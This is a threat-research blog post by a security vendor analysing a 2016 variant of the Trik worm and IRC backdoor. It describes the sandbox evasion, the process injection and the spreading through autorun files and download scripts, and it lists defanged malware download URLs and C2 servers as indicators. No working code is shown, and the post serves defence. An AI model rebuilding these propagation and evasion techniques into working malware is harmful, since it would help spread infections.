Over the past couple of months, Cyphort Labs identified a new version of Trik bot. Our in-the-wild Top Threats identification shows this bot to be one of the top in June and July. Trik is a worm which propagates through removable and network drives. It can also propagate by copying itself in web root folders, ftp folders or other folders that are accessible online. It is also a backdoor that communicates via IRC. Other names of this bot are Backdoor:Win32/Kirts or Worm:Porphiex. Cyphort Labs did a deep dive analysis of this malware.
Discovery
Trik is an old bot which was first seen in 2011. Its modus operandi is to use instant messaging systems to propagate. Over the past years, this bot appears to go quiet. From January to May 2016, we have only identified 84 variants of Trik. However starting from June to July 25, we identified 1,447 variants of the sample.
We discovered an early version of this bot on Virustotal which was seen on February 15, 2016. The sample with sha256 cdb6f46a56d97a962278960f4a58bbcd2270f27635f7c638884968ae44205931 timestamp is February 11, 2016. The sample is also packed with the compressed data in its resource section.
We unpacked this file and identified the name and version of this bot based on the reference of its .pdb file.
- C:\Users\x\Desktop\Home\Code\Trik v1.8\Release\Trik.pdb
Fast forward to July 2016, Trik uses a .NET packer/protector. Also the pdb file shows it is now in version 2.6. This means that from 2011 until May 2016, we are only seeing version 1 updates of Trik but starting June, the actors are actively involved in the operations of Trik.
Aside from .NET protector, samples are now signed but from untrusted root CA.
The following analysis will now focus on the recent sample with sha256, 0b6258dc856fb84d11d368d3c8a4d6b3a379297ab08efa89b3f1a6ea5f556558
Packer
Similar to the first version, this .NET packer’s compressed data is in its resource section. It also has a loader which first checks for some sandbox and virtualization software before loading the payload.
The loader will first decrypt its configuration file in its resource section. The configuration is an array that defines the execution flow of the malware including mutex names. Based on the configuration, it can also delete the property of the file being downloaded from the internet by deleting this the alternate data stream “{filename}:Zone.Identifier”. This will bypass dialog window from browsers implying the file was downloaded from the internet. This is an indication that the attackers using drive-by-download as a means to install this bot.
Armoring
This variant also detects the following softwares which are popular sandbox, and network analysis tools:
- SandBoxie
- Fiddler
- Wireshark
- WPE
The configuration also identifies the process where it will inject its code. It may choose from either the following processes:
- vbc.exe
- RegAsm.exe
- AppLaunch.exee
- svchost.exe
- notepad.exe
- self
In our sample, it injects on itself by launching a suspended process and writes into it.
The code injected is located in the resource section and encrypted. The decryption is a combination of rolling XOR with the keys also defined in the configuration.
Main Payload
The unpacked code is not in .NET assembly format but in C++. The version of this bot is identfied on its pdb reference which is v2.6.
- C:\Users\s\Desktop\Home\Code\Trik v2.6\Release\Trik.pdb
Similar to earlier version, the unpacked code is straight-forward.
It will first employ its Anti analysis, Anti Sandbox and Anti Virtualization checks. If found, it will uninstall itself.
AntiVirtual
Blacklisted Processes
Blacklisted DLL
Blacklisted Window Names
Blacklisted File Name
Blacklisted File Path
Blacklisted User Names
“Tequilaboomboom” might be the preferred user name of the author used during development of the malware.
To check if it has already infected the system it looks for the mutex name “t71. It also checks if it is running as:
- %windir%\M-50504502689047502405034500693020490\winmgr.exe
If not, it will create a copy of itself in the same path above. It also adds itself in the Authorized Application list in the Firewall Policy settings. Creates Autostarts and disables the Windefender service.
It will create four threads which is the main payload routine.
Worm Routine on Removable and Network Drives
This is not a typical worming routine where it will drop a copy of itself into target folders or drives. Instead, it will drop a script that will download a copy or most likely an updated version of “Trik”. This method is another evasion technique employed by the malware. Even if the version of the malware is already detected, those infected drives with the components of the worm will have a chance to evade the detection.
Trik will first check if the download urls are accessible by iterating a list of urls and trying to download the “.exe” in the temp folder.. For the sample we checked, the following are the download URL.
- http://124[.]158[.]10[.]82/t.exe
- http://125[.]212[.]217[.]30/t.exe
- http://220[.]181[.]87[.]80/t.exe
- http://125[.]212[.]217[.]33/t.exe
- http://210[.]211[.]116[.]246/t.exe
- http://host5050[.]ru/t.exe
- http://host5051[.]ru/t.exe
- http://ouefuguefhuwuhs[.]ru/t.exe
- http://uwgfusubwbusswf[.]ru/t.exe
After successful verification, it proceeds on finding specific drives. It targets removable and remote drives except drive “a” or “b”.
Depending on the type of drive, it will drop the following files:
- Autorun.inf
- DeviceManager.bat
- Manager.bat (if target drive is network drive)
- Manager.js (if target drive is removable)
- .lnk (shortcut file to Manager.js or Manager.bat)
Autorun.inf will function as an autostart and simply opening the drive will execute the malware. It executes Manager.bat or Manajer.js which will then execute DeviceManager.bat. DeviceManager.bat will contain a powershell script that will download and execute a copy or an update of Trik as %temp%\winupd.exe. As an additional evasion technique, it adds random strings in between lines of the scripts. For example, contents of autorun.inf are as follows:
Without the randomizer, the script will only contain the following:
DeviceManager.bat executes a powershell script or launches bitsadmin.exe to download Trik. It contains the following: (We removed the random strings to show clearly how the script works)
Worm Routine on Fixed Drives
Aside from worming on removable or network drives, it will also propagates a copy of itself into specific folders in fixed drives. It targets folders related to web root folders, ftp folders, or other sharing folders. It specifically looks for the following sub strings in the folder:
If found, for every “.exe” file in that folder, it will replace it with a copy of itself. Likewise, for every “.zip” or “.rar” in that folder it will add a copy of itself as “README.txt.scr”.
Backdoor Routine
Trik is an IRC backdoor. The sample we analyzed connects to any of the following IRC servers all on port 5050:
- 125.212.217.30
- 220.181.87.80
- 124.158.10.82
- 125.212.217.33
- 210.211.116.246
- host5050.ru
- host5051.ru
- ouefuguefhuwuhs.ru
- uwgfusubwbusswf.ru
- oeuuguhwugfuuws.ru
- efugusgdugugg.ru
- wdoaefaeodegfe.ru
- foeaufguehuaee.ru
- efuegdugugg.ru
- wdoargsiheffea.ru
- fofhihihienfospf.ru
- fgazeeufueea.ru
- wgwuwgruwddhuw.ru
If one of the IRC servers is online, it will issue a NICK containing system info and USER command. The USER command contained fixed parameters which is always ‘x “” “x” :x’
The NICK message contains system information including windows version, keyboard layout info, and whether the user is admin or not.
If successful, it will now wait for specific commands. It specifically looks for strings “001”, “433”, and “332” in the message as a signal for command. Command 001 means it will ask the bot to join to a specific channel. Command 433 instructs the bot to send system information. Command 332 contains additional sub command. It can instruct the bot to:
- Remove itself from the system
- Send more system information
- Download and execute files
It also seeks specific countries by getting the geolocation of the infected user through http://api.wipmania.com/. It will only download from specific list of countries hardcoded in its body. The list contains only countries from Americas and European countries.
Cyphort detects Trik as TROJAN.KIRTS.CY
The post Trik: A Bot With A Lot Up Its Sleeve appeared first on Cyphort.